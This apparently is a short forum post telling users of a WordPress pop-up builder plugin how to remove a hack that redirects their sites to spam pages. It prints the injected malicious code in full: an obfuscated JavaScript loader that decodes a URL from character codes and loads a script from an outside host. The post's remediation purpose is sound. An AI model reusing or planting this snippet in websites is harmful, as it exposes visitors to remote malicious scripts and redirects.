This is how to fix the recent Hack,
-
Hi,
If you use the pop up builder plugin you may have noticed your site redirecting to spam pages due to a recent hack. Thankfully it’s a simple fix.
The developer has updated the plugin so all you need to do is update the plugin, then go to edit your active pop ups and at the bottom of the editor you’ll find a section for custom javascript containing the malicious code which you can delete.
Hope this helps,
The Malicious Code
(function() { var elem = document.createElement('script'); elem.type = 'text/javascript'; elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,99,108,111,110,46,99,111,108,108,101,99,116,102,97,115,116,116,114,97,99,107,115,46,99,111,109,47,98,108,111,99,107);document.getElementsByTagName("head")[0].appendChild(elem);})();
- The topic ‘This is how to fix the recent Hack,’ is closed to new replies.